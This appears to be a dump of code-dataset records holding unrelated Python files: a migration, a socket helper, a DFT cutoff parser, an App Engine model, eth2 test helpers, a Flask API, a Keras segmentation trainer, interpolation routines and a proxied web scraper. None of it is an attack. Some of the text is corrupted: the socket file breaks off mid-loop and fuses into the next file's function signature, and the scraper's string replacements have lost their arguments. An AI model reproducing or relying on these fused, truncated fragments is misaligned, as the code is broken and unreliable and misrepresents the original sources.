op.drop_index(op.f('ix_admin_email'), table_name='admin')\n    op.drop_table('admin')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/3392bc189467_table_admin.py","file_name":"3392bc189467_table_admin.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"558038446","text":"import socket\n\nclass F(object):\n\tdef __init__(self, c):\n\t\tself.c = c\n\tdef recvLen(self, l=4):\n\t\tbytes = b''\n\t\twhile len(bytes) Optional[int]:\n    \"\"\"\n    Density wave cutoff, only meaningful for quantumespresso\n    \"\"\"\n    # Constants\n    #-----------\n    ryd_to_ev =  13.60569\n\n    # Main Program\n    #-------------\n\n    if  dftcode == 'quantumespresso':\n        parsed = parse_line(log,'charge density cutoff',0)\n        if parsed is None:\n            raise ValueError\n        else:\n            raw    = parsed.split('=')[1][:7]\n            return round(ryd_to_ev * float(raw))\n    else:\n        return None\n","sub_path":"catalog_model/scripts/Pure/Load/get_dw.py","file_name":"get_dw.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"187380796","text":"from google.appengine.ext import db\nfrom google.appengine.api import users\n\nclass Balance(db.Model):\n  lender = db.UserProperty()\n  borrower = db.UserProperty()\n  balance = db.IntegerProperty()\n\nclass Database():\n  def __init__(self):\n    pass\n\n  def getBalance(self, user):\n    accounts_receivable = db.GqlQuery((\"SELECT * FROM Balance WHERE \"\n                                       \"lender = :1 ORDER BY borrower\"), user)\n    accounts_payable = db.GqlQuery((\"SELECT * FROM Balance WHERE \"\n                                    \"borrower = :1 ORDER BY lender\"), user)\n    total_balance = 0\n    for b in accounts_receivable:\n      total_balance += b.balance\n    for b in accounts_payable:\n      total_balance -= b.balance\n    return total_balance\n\n  def SetBalance(self, user, borrower, amount): \n    b = Balance()\n    b.lender = user\n    b.borrower = users.User(borrower)\n    b.balance = int(amount)\n    b.put()\n\n","sub_path":"appengine/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61607364","text":"from eth2spec.utils import bls\nfrom eth2spec.test.helpers.keys import privkeys\n\n\ndef prepare_signed_exits(spec, state, indices):\n    domain = spec.get_domain(state, spec.DOMAIN_VOLUNTARY_EXIT)\n\n    def create_signed_exit(index):\n        exit = spec.VoluntaryExit(\n            epoch=spec.get_current_epoch(state),\n            validator_index=index,\n        )\n        signing_root = spec.compute_signing_root(exit, domain)\n        return spec.SignedVoluntaryExit(message=exit, signature=bls.Sign(privkeys[index], signing_root))\n\n    return [create_signed_exit(index) for index in indices]\n\n\ndef sign_voluntary_exit(spec, state, voluntary_exit, privkey):\n    domain = spec.get_domain(state, spec.DOMAIN_VOLUNTARY_EXIT, voluntary_exit.epoch)\n    signing_root = spec.compute_signing_root(voluntary_exit, domain)\n    return spec.SignedVoluntaryExit(\n        message=voluntary_exit,\n        signature=bls.Sign(privkey, signing_root)\n    )\n","sub_path":"tests/core/pyspec/eth2spec/test/helpers/voluntary_exits.py","file_name":"voluntary_exits.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"607038530","text":"from flask import Flask , request , abort, make_response\nfrom flask.json import jsonify\nfrom backend.app import app\nfrom backend.models.shelter import Shelter\nfrom backend.database import db_session\nfrom sqlalchemy.exc import IntegrityError\nfrom flask_jwt_extended import create_access_token ,jwt_required ,get_jwt_identity\n\n@app.route('/shelter/',methods = ['GET','POST'])\ndef shelter():\n    if request.method == 'POST':\n        content = request.get_json()\n        if 'name' not in content or 'email' not in content or 'address' not in  content:\n            abort(make_response(jsonify(message=\"all parameters must be set\"), 400))\n        try:\n            shelter = Shelter(content['name'] , content['email'],content['address'])\n            db_session.add(shelter)\n            db_session.commit()\n        except IntegrityError:\n            db_session.rollback()\n            abort(make_response(jsonify(message='Shelter with this email or adress has already been registered'), 400))\n        except Exception as e :\n            abort(500,{'message':str(e)})\n        return jsonify({'message':'success'})\n    if request.method == 'GET':\n        shelters=Shelter.query.all()\n        return jsonify([{i.id:i.serialized} for i in shelters])\n    return abort(404)\n\n@app.route('/shelter//',methods=['GET','PUT','DELETE'])\ndef shleter_instace(id):\n    try:\n        shelter=Shelter.query.get(id)\n        if not shelter:\n            raise Exception  \n    except:       \n        abort(make_response(jsonify(message='no such shelter'), 400))\n    if request.method == \"GET\":\n        return jsonify(shelter.serialized)\n    if request.method == \"DELETE\":\n        db_session.delete(shelter)\n        db_session.commit()\n        return(shelter.serialized)\n    if request.method == \"PUT\":\n        content = request.get_json()\n        if 'name' not in content or 'email' not in content or 'address' not in  content:\n            abort(400,{'message':'all required parameters must be set'})\n        shelter.name = content['name']\n        shelter.email = content['email']\n        shelter.address = content['address']\n        db_session.commit()\n        return jsonify(shelter.serialized)\n\n    return abort(404)\n","sub_path":"backend/views/old/shelter.py","file_name":"shelter.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"185371072","text":"\nfrom KerasFCN.models import FCN_Vgg16_32s\n\n\n# unet weighted\n\nfrom keras.models import Model\nfrom keras.layers import Input, Conv2D, MaxPooling2D, UpSampling2D, Dropout, InputSpec, Layer\nfrom keras.layers import concatenate, Conv2DTranspose, merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.core import SpatialDropout2D, Activation\nfrom keras.layers.merge import Add\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras.backend import permute_dimensions\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, CSVLogger, TerminateOnNaN, ReduceLROnPlateau\nfrom keras.optimizers import Adam, SGD, RMSprop\nimport tensorflow as tf\nimport numpy as np\nfrom skimage import transform\nfrom skimage.transform import AffineTransform\nfrom scipy import ndimage\nfrom datetime import datetime\nfrom random import randint\nimport random\nfrom math import ceil\nimport os\n\n\nBATCH_SIZE = 4\n\nIMG_HEIGHT = 224\nIMG_WIDTH = 224\n\n# Number of image channels (for example 3 in case of RGB, or 1 for grayscale images)\nINPUT_CHANNELS = 3\n# Number of output masks (1 in case you predict only one type of objects)\nOUTPUT_MASK_CHANNELS = 1\n\nif K.image_data_format() == 'channels_first':\n    input_shape = (3, IMG_WIDTH, IMG_HEIGHT)\nelse:\n    input_shape = (IMG_WIDTH, IMG_HEIGHT, 3)\n\n\ndef get_train_imgs():\n    return ['../data/training/images/train_img_'+str(x)+'.jpg' for x in range(1, 1501)]\n\n\ndef get_train_masks():\n    return ['../data/training/masks/train_mask_'+str(x)+'.ppm' for x in range(1, 1501)]\n\n\ndef get_val_imgs():\n    return ['../data/validation/images/validation_img_'+str(x)+'.jpg' for x in range(1, 501)]\n\n\ndef get_val_masks():\n    return ['../data/validation/masks/validation_mask_'+str(x)+'.ppm' for x in range(1, 501)]\n\n\ndef current_time():\n    return datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n\n\ndef get_img_mask():\n    idx = 300\n    train_imgs = get_train_imgs()\n    train_masks = get_train_masks()\n    train_imgs.extend(get_val_imgs()[:idx])\n    train_masks.extend(get_val_masks()[:idx])\n    val_imgs = get_val_imgs()[idx:]\n    val_masks = get_val_masks()[idx:]\n    return train_imgs, train_masks, val_imgs, val_masks\n\n\ndef transform_img(img, mask):\n    theta = randint(-100, 100) / 1800\n    zoom = randint(950, 1050) / 1000\n    shear = randint(-100, 100) / 1800\n    hrz_trans = randint(-20, 20)\n    vrt_trans = randint(-20, 20)\n\n    affine = AffineTransform(scale=(zoom, zoom),\n                             rotation=theta,\n                             shear=shear,\n                             translation=(hrz_trans, vrt_trans))\n\n    img = transform.warp(img, affine.inverse)\n    mask = transform.warp(mask, affine.inverse)\n\n    if random.random() < 0.5:\n        img = np.flip(img, 1)\n        mask = np.flip(mask, 1)\n\n    return img, mask\n\n\ndef generate_data(x_path, y_path, batch):\n    mod, idx = len(x_path), 0\n    img_shape = (batch, input_shape[0], input_shape[1], input_shape[2])\n    mask_shape = (batch, input_shape[0], input_shape[1], 1)\n\n    while True:\n        samples = random.sample(range(0, mod), mod)\n        samples = [samples[batch*i: batch*i+batch] for i in range(mod//batch)]\n\n        for smpl in samples:\n            x = np.zeros(shape=img_shape, dtype=np.float32)\n            y = np.zeros(shape=mask_shape, dtype=np.float32)\n\n            for i, s in enumerate(smpl):\n                img, msk = ndimage.imread(x_path[s]), ndimage.imread(y_path[s])\n                msk = msk[:, :, 1:2]\n                img, msk = transform_img(img, msk)\n                x[i], y[i] = img, msk\n\n            yield (x, y)\n\n\ndef dice_coef(y_true, y_pred):\n    y_true_f = K.flatten(y_true)\n    y_pred_f = K.flatten(y_pred)\n    intersection = K.sum(y_true_f * y_pred_f)\n    return (2. * intersection + 1.0) / (K.sum(y_true_f) + K.sum(y_pred_f) + 1.0)\n\n\ndef dice_coef_loss(y_true, y_pred):\n    return -dice_coef(y_true, y_pred)\n\n\ndef resize_images_bilinear(X, height_factor=1, width_factor=1, target_height=None, target_width=None, data_format='default'):\n    if data_format == 'default':\n        data_format = K.image_data_format()\n    if data_format == 'channels_first':\n        original_shape = K.int_shape(X)\n        if target_height and target_width:\n            new_shape = tf.constant(np.array((target_height, target_width)).astype('int32'))\n        else:\n            new_shape = tf.shape(X)[2:]\n            new_shape *= tf.constant(np.array([height_factor, width_factor]).astype('int32'))\n        X = permute_dimensions(X, [0, 2, 3, 1])\n        X = tf.image.resize_bilinear(X, new_shape)\n        X = permute_dimensions(X, [0, 3, 1, 2])\n        if target_height and target_width:\n            X.set_shape((None, None, target_height, target_width))\n        else:\n            X.set_shape((None, None, original_shape[2] * height_factor, original_shape[3] * width_factor))\n        return X\n    elif data_format == 'channels_last':\n        original_shape = K.int_shape(X)\n        if target_height and target_width:\n            new_shape = tf.constant(np.array((target_height, target_width)).astype('int32'))\n        else:\n            new_shape = tf.shape(X)[1:3]\n            new_shape *= tf.constant(np.array([height_factor, width_factor]).astype('int32'))\n        X = tf.image.resize_bilinear(X, new_shape)\n        if target_height and target_width:\n            X.set_shape((None, target_height, target_width, None))\n        else:\n            X.set_shape((None, original_shape[1] * height_factor, original_shape[2] * width_factor, None))\n        return X\n    else:\n        raise Exception('Invalid data_format: ' + data_format)\n\n\nclass BilinearUpSampling2D(Layer):\n    def __init__(self, size=(1, 1), target_size=None, data_format='default', **kwargs):\n        if data_format == 'default':\n            data_format = K.image_data_format()\n        self.size = tuple(size)\n        if target_size is not None:\n            self.target_size = tuple(target_size)\n        else:\n            self.target_size = None\n        assert data_format in {'channels_last', 'channels_first'}, 'data_format must be in {tf, th}'\n        self.data_format = data_format\n        self.input_spec = [InputSpec(ndim=4)]\n        super(BilinearUpSampling2D, self).__init__(**kwargs)\n\n    def compute_output_shape(self, input_shape):\n        if self.data_format == 'channels_first':\n            width = int(self.size[0] * input_shape[2] if input_shape[2] is not None else None)\n            height = int(self.size[1] * input_shape[3] if input_shape[3] is not None else None)\n            if self.target_size is not None:\n                width = self.target_size[0]\n                height = self.target_size[1]\n            return (input_shape[0],\n                    input_shape[1],\n                    width,\n                    height)\n        elif self.data_format == 'channels_last':\n            width = int(self.size[0] * input_shape[1] if input_shape[1] is not None else None)\n            height = int(self.size[1] * input_shape[2] if input_shape[2] is not None else None)\n            if self.target_size is not None:\n                width = self.target_size[0]\n                height = self.target_size[1]\n            return (input_shape[0],\n                    width,\n                    height,\n                    input_shape[3])\n        else:\n            raise Exception('Invalid data_format: ' + self.data_format)\n\n    def call(self, x, mask=None):\n        if self.target_size is not None:\n            return resize_images_bilinear(x, target_height=self.target_size[0], target_width=self.target_size[1], data_format=self.data_format)\n        else:\n            return resize_images_bilinear(x, height_factor=self.size[0], width_factor=self.size[1], data_format=self.data_format)\n\n    def get_config(self):\n        config = {'size': self.size, 'target_size': self.target_size}\n        base_config = super(BilinearUpSampling2D, self).get_config()\n        return dict(list(base_config.items()) + list(config.items()))\n\n\ndef identity_block(kernel_size, filters, stage, block, weight_decay=0., batch_momentum=0.99):\n\n    def f(input_tensor):\n        nb_filter1, nb_filter2, nb_filter3 = filters\n        if K.image_data_format() == 'channels_last':\n            bn_axis = 3\n        else:\n            bn_axis = 1\n        conv_name_base = 'res' + str(stage) + block + '_branch'\n        bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n        x = Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter2, (kernel_size, kernel_size),\n                          padding='same', name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)\n\n        x = Add()([x, input_tensor])\n        x = Activation('relu')(x)\n        return x\n    return f\n\n\ndef conv_block(kernel_size, filters, stage, block, weight_decay=0., strides=(2, 2), batch_momentum=0.99):\n\n    def f(input_tensor):\n        nb_filter1, nb_filter2, nb_filter3 = filters\n        if K.image_data_format() == 'channels_last':\n            bn_axis = 3\n        else:\n            bn_axis = 1\n        conv_name_base = 'res' + str(stage) + block + '_branch'\n        bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n        x = Conv2D(nb_filter1, (1, 1), strides=strides,\n                          name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',\n                          name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)\n\n        shortcut = Conv2D(nb_filter3, (1, 1), strides=strides,\n                                 name=conv_name_base + '1', kernel_regularizer=l2(weight_decay))(input_tensor)\n        shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1', momentum=batch_momentum)(shortcut)\n\n        x = Add()([x, shortcut])\n        x = Activation('relu')(x)\n        return x\n    return f\n\n\n# Atrous-Convolution version of residual blocks\ndef atrous_identity_block(kernel_size, filters, stage, block, weight_decay=0., atrous_rate=(2, 2), batch_momentum=0.99):\n\n    def f(input_tensor):\n        nb_filter1, nb_filter2, nb_filter3 = filters\n        if K.image_data_format() == 'channels_last':\n            bn_axis = 3\n        else:\n            bn_axis = 1\n        conv_name_base = 'res' + str(stage) + block + '_branch'\n        bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n        x = Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter2, (kernel_size, kernel_size), dilation_rate=atrous_rate,\n                          padding='same', name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)\n\n        x = Add()([x, input_tensor])\n        x = Activation('relu')(x)\n        return x\n    return f\n\n\ndef atrous_conv_block(kernel_size, filters, stage, block, weight_decay=0., strides=(1, 1), atrous_rate=(2, 2), batch_momentum=0.99):\n\n    def f(input_tensor):\n        nb_filter1, nb_filter2, nb_filter3 = filters\n        if K.image_data_format() == 'channels_last':\n            bn_axis = 3\n        else:\n            bn_axis = 1\n        conv_name_base = 'res' + str(stage) + block + '_branch'\n        bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n        x = Conv2D(nb_filter1, (1, 1), strides=strides,\n                          name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', dilation_rate=atrous_rate,\n                          name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)\n        x = Activation('relu')(x)\n\n        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)\n        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)\n\n        shortcut = Conv2D(nb_filter3, (1, 1), strides=strides,\n                                 name=conv_name_base + '1', kernel_regularizer=l2(weight_decay))(input_tensor)\n        shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1', momentum=batch_momentum)(shortcut)\n\n        x = Add()([x, shortcut])\n        x = Activation('relu')(x)\n        return x\n    return f\n\n\ndef AtrousFCN_Resnet50_16s(input_shape = None, weight_decay=0., batch_momentum=0.9, batch_shape=None, classes=1):\n\n    if batch_shape:\n        img_input = Input(batch_shape=batch_shape)\n        image_size = batch_shape[1:3]\n    else:\n        img_input = Input(shape=input_shape)\n        image_size = input_shape[0:2]\n\n    bn_axis = 3\n\n    x = Conv2D(64, (7, 7), strides=(2, 2), padding='same', name='conv1', kernel_regularizer=l2(weight_decay))(img_input)\n    x = BatchNormalization(axis=bn_axis, name='bn_conv1', momentum=batch_momentum)(x)\n    x = Activation('relu')(x)\n    x = MaxPooling2D((3, 3), strides=(2, 2))(x)\n\n    x = conv_block(3, [64, 64, 256], stage=2, block='a', weight_decay=weight_decay, strides=(1, 1), batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [64, 64, 256], stage=2, block='b', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [64, 64, 256], stage=2, block='c', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n\n    x = conv_block(3, [128, 128, 512], stage=3, block='a', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [128, 128, 512], stage=3, block='b', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [128, 128, 512], stage=3, block='c', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [128, 128, 512], stage=3, block='d', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n\n    x = conv_block(3, [256, 256, 1024], stage=4, block='a', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [256, 256, 1024], stage=4, block='b', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [256, 256, 1024], stage=4, block='c', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [256, 256, 1024], stage=4, block='d', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [256, 256, 1024], stage=4, block='e', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n    x = identity_block(3, [256, 256, 1024], stage=4, block='f', weight_decay=weight_decay, batch_momentum=batch_momentum)(x)\n\n    x = atrous_conv_block(3, [512, 512, 2048], stage=5, block='a', weight_decay=weight_decay, atrous_rate=(2, 2), batch_momentum=batch_momentum)(x)\n    x = atrous_identity_block(3, [512, 512, 2048], stage=5, block='b', weight_decay=weight_decay, atrous_rate=(2, 2), batch_momentum=batch_momentum)(x)\n    x = atrous_identity_block(3, [512, 512, 2048], stage=5, block='c', weight_decay=weight_decay, atrous_rate=(2, 2), batch_momentum=batch_momentum)(x)\n    #classifying layer\n    #x = Conv2D(classes, (3, 3), dilation_rate=(2, 2), kernel_initializer='normal', activation='linear', padding='same', strides=(1, 1), kernel_regularizer=l2(weight_decay))(x)\n    x = Conv2D(classes, (1, 1), kernel_initializer='he_normal', activation='sigmoid', padding='same', strides=(1, 1), kernel_regularizer=l2(weight_decay))(x)\n    x = BilinearUpSampling2D(target_size=tuple(image_size))(x)\n\n    model = Model(img_input, x)\n    model.load_weights('pretrain/fcn_resnet50_weights_tf_dim_ordering_tf_kernels.h5', by_name=True)\n    return model\n\n\ndef train_res_fcn(model, epochs):\n    train_imgs, train_masks, val_imgs, val_masks = get_img_mask()\n\n    steps_per_epoch = int(ceil(len(train_imgs) / BATCH_SIZE))\n    validation_steps = int(ceil(len(val_imgs) / BATCH_SIZE))\n\n    attrib = 'fcn'\n    model_type = 'res50'\n    filename = current_time()+'-'+attrib\n    os.mkdir('models/'+filename)\n\n    with open('models/'+filename+'/attrib.txt', 'wt') as file_writer:\n        file_writer.write('used '+model_type+'.'+attrib+'.py\\n')\n\n    callback_stopping = EarlyStopping(patience=20, monitor='val_loss')\n    callback_checkpoint = ModelCheckpoint('models/' + filename + '/model.'+attrib+'.'+model_type+'.hdf5',\n                                          monitor='val_loss', save_best_only=True)\n    callback_reduce_lr = ReduceLROnPlateau(monitor='val_loss',\n                                           factor=0.1, patience=4,\n                                           verbose=1, min_lr=1e-6)\n    callback_csv = CSVLogger('models/' + filename + '/run_log.csv', append=True)\n    callback_terminate_nan = TerminateOnNaN()\n    model.compile(optimizer=SGD(lr=0.01, momentum=0.9), loss=dice_coef_loss, metrics=[dice_coef])\n\n    model.fit_generator(generate_data(train_imgs, train_masks, BATCH_SIZE),\n                        steps_per_epoch=steps_per_epoch,\n                        epochs=epochs,\n                        verbose=1,\n                        callbacks=[callback_stopping,\n                                   callback_checkpoint,\n                                   callback_reduce_lr,\n                                   callback_csv,\n                                   callback_terminate_nan],\n                        validation_data=generate_data(val_imgs, val_masks, BATCH_SIZE),\n                        validation_steps=validation_steps)\n\n    with open('models/'+filename+'/job_completed.txt', 'wt') as file_writer:\n        file_writer.write('job finished gracefully\\n')\n    model.save('models/' + filename + '/model.'+attrib+'.'+model_type+'.final.hdf5')\n\n    return model\n\n\ndef run():\n    model = AtrousFCN_Resnet50_16s(input_shape=input_shape, classes=1)\n    train_res_fcn(model, 100)\n\n\nif __name__ == '__main__':\n    run()\n\n\n# end of file\n","sub_path":"segmentation/fcn/res.fcn.py","file_name":"res.fcn.py","file_ext":"py","file_size_in_byte":19352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"339265852","text":"import numpy as np\n\n# signal processing routines which aren't in scipy/numpy, or are very slow\n#\n# LOG\n#\n# July 2013 - R. Barends\n# added interp1d_cubic and moving_average\n\ndef interp1d_cubic(x,h,bounds_error=False,fill_value=None):\n    \"\"\"Fast cubic interpolator (slightly faster than linear version of scipy interp1d; much, much faster than cubic version of scipy interp1d). \n    Returns a function in the same fashion as interp1d works.\n    Uses linear interpolation at the edges.\n    If bounds_error is True, an error is raised if values are outsde of the range.   \n    Otherwise, it returns the fill_value if set, or values at the edges outside of the range.\n    x needs to be equidistant, and can be monotonically increasing or decreasing. RB.\n    \"\"\"    \n    #check whether x is equidistant:\n    diff = x[1:]-x[:-1]\n    machineprecision=1e-11\n    diffrel=abs(diff-diff[0])>machineprecision #if it is equidistant, it should be zero within the machine precision\n    if diffrel.any():\n        raise Exception('x is not equidistant')\n    xstart=x[0]\n    xlen=len(x)\n    dx=1.*(x[1]-x[0])\n    if type(h) is not np.ndarray:\n        #we need a numpy array\n        h=1.*np.array(h)\n    def func(xdet):\n        if type(xdet) is not list and type(xdet) is not np.ndarray:\n            xdet=np.array([xdet])        \n        yout=np.zeros(np.alen(xdet)).astype(h.dtype) #predefine in the same type as h (old:complex)\n        x2 = (xdet-xstart)/dx #map xdet onto h index: x ->   (x-xstart)/dx = 0... length\n        \n        #indices outside of the range\n        xdet_idx = x2<0 #maps which index in x2 it is\n        if xdet_idx.any():\n            if bounds_error:\n                raise Exception('interpolation outside of range')\n            x2_idx = x2[ xdet_idx ] #maps x2 to x index\n            h_idx = np.array(x2_idx).astype(int) #maps which h,x to take\n            if fill_value is None:\n                yout[xdet_idx]=h[0]\n            else:\n                yout[xdet_idx]=fill_value\n        xdet_idx = x2>(xlen-1) #maps which index in x2 it is\n        if xdet_idx.any():\n            if bounds_error:\n                raise Exception('interpolation outside of range')        \n            x2_idx = x2[ xdet_idx ] #maps x2 to x index\n            h_idx = np.array(x2_idx).astype(int) #maps which h,x to take\n            if fill_value is None:            \n                yout[xdet_idx]=h[xlen-1]\n            else:\n                yout[xdet_idx]=fill_value                \n            \n        #indices on the rim: linear interpolation\n        xdet_idx =  np.logical_and(x2>=0,x2<1) #maps which index in x2 it is\n        if xdet_idx.any():\n            x2_idx = x2[ xdet_idx ] #maps x2 to x index\n            h_idx = np.array(x2_idx).astype(int) #maps which h,x to take        \n            yout[xdet_idx]=(h[1]-h[0])*x2_idx  + h[0]\n        xdet_idx =  np.logical_and(x2>=(xlen-2),x2<=(xlen-1)) #maps which index in x2 it is\n        if xdet_idx.any():\n            x2_idx = x2[ xdet_idx ] #maps x2 to x index\n            h_idx = np.array(x2_idx).astype(int) #maps which h,x to take        \n            yout[xdet_idx]=(h[xlen-1]-h[xlen-2])*(x2_idx-h_idx[0])  + h[xlen-2]\n            \n        #indices inside the range: cubic interpolation        \n        xdet_idx = np.logical_and(x2>=1,x2<(xlen-2)) #maps which index in x2 it is\n        if xdet_idx.any():        \n            x2_idx = x2[ xdet_idx ] #maps x2 to x index\n            h_idx = np.array(x2_idx).astype(int) #maps which h,x to take\n            hp2=h[h_idx+2]\n            hp1=h[h_idx+1]\n            hp0=h[h_idx]\n            hm1=h[h_idx-1]     \n            d=hp0\n            c=(hp1-hm1)/2.\n            b=(-hp2+4*hp1-5*hp0+2*hm1)/2.\n            a=(hp2-3*hp1+3*hp0-hm1)/2.\n            xi=(x2_idx - h_idx)\n            yout[xdet_idx]=((a * xi + b) * xi + c) * xi + d\n            \n        return np.array(yout)          \n    return func\n\ndef moving_average(x,m):\n    \"\"\"Moving average on x, with length m. Expects a numpy array for x. Elements are given by\n    y[i] = Sum_{k=0..m-1}   y[l] / m\n    with l=i-fix(m/2)+k between 0 and length(x)-1. RB.\"\"\"\n    n=np.alen(x)\n    before=-np.fix(int(m)/2.0)\n    y=[]\n    for i in np.arange(len(x)):\n        a=0.0\n        for tel in np.arange(int(m)):\n            idx=i+before+tel\n            if idx<0:\n                idx=0\n            elif idx>=n:\n                idx=n-1\n            a += x[idx]/np.float(m)\n        y.append(a)\n    return np.array(y)\n\n    \n\"\"\"\nimport matplotlib.pyplot as plt\nimport time\nfrom scipy.interpolate import interp1d\ndef test(): \n    x=np.linspace(0,2,2001)\n    y=np.sin(6.23*x)*x**2 +1j*np.cos(10*x) +0.1*np.random.rand(np.alen(x))\n    x2=np.linspace(-3,3,30001)\n    t=time.time()\n    y2=interp1d_cubic(x,y)(x2)\n    print time.time()-t\n\n    t=time.time()\n    yy=interp1d(x,y,'linear',bounds_error=False)(x2)\n    print time.time()-t\n\n\n    plt.figure()\n    print len(x2),len(y2)\n    plt.plot(x,np.real(y),'k.',x2,np.real(y2)) \n    plt.plot(x,np.imag(y),'k.',x2,np.imag(y2)) \n    plt.show()\n\"\"\"","sub_path":"xlpyle/simulation/interpol.py","file_name":"interpol.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"340484757","text":"import requests\nimport time\nfrom lxml import etree\nfrom Utils.MysqlClass import Mysql\nimport Utils.utils as utils\nfrom Utils.GetProxy import get_proxy\n\ndef getpage(datadict):\n\t\"\"\"\n\t\t根据数据字典获取页面,然后分析页面,返回结果\n\t:param datadict: 数据字典 传入爬虫的参数数据\n\t:return: 返回两个列表,第一个是标题列表 第二个是链接列表\n\t\"\"\"\n\turl = \"https://so.csdn.net/so/search/s.do?\"\n\ttime.sleep(1)\n\theaders = {\n\t\t'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0'\n\t}\n\tpage = requests.get(url, params=datadict, headers=headers, proxies=get_proxy()).text\n\tpage = page.replace(\"\", \"\")\n\tpage = page.replace(\"\", \"\")\n\thtml = etree.HTML(page)\n\tresult_url = html.xpath(\"//div[@class='limit_width']/a[1]/@href\")\n\tresult_title = html.xpath(\"//div[@class='limit_width']/a[1]/text()\")\n\treturn result_title, result_url\n\n\ndef save2db(titlelist, urllist, scatalogid):\n\t\"\"\"\n\n\t:param titlelist: 标题列表\n\t:param urllist: 链接列表\n\t:param scatalogid: 二级目录的id\n\t:return: 无返回值\n\t\"\"\"\n\tif len(titlelist) != len(urllist):\n\t\treturn None\n\tmysql = Mysql()\n\tfor i in range(len(titlelist)):\n\t\tdatadict = {\"title\": titlelist[i].encode(\"utf-8\"),\n\t\t            \"href\": urllist[i].encode(\"utf-8\"),\n\t\t            \"preid\": scatalogid,\n\t\t            \"fullcontent\": getmaincontenthtml(urllist[i]).encode(\"utf-8\"),\n\t\t            \"content\": 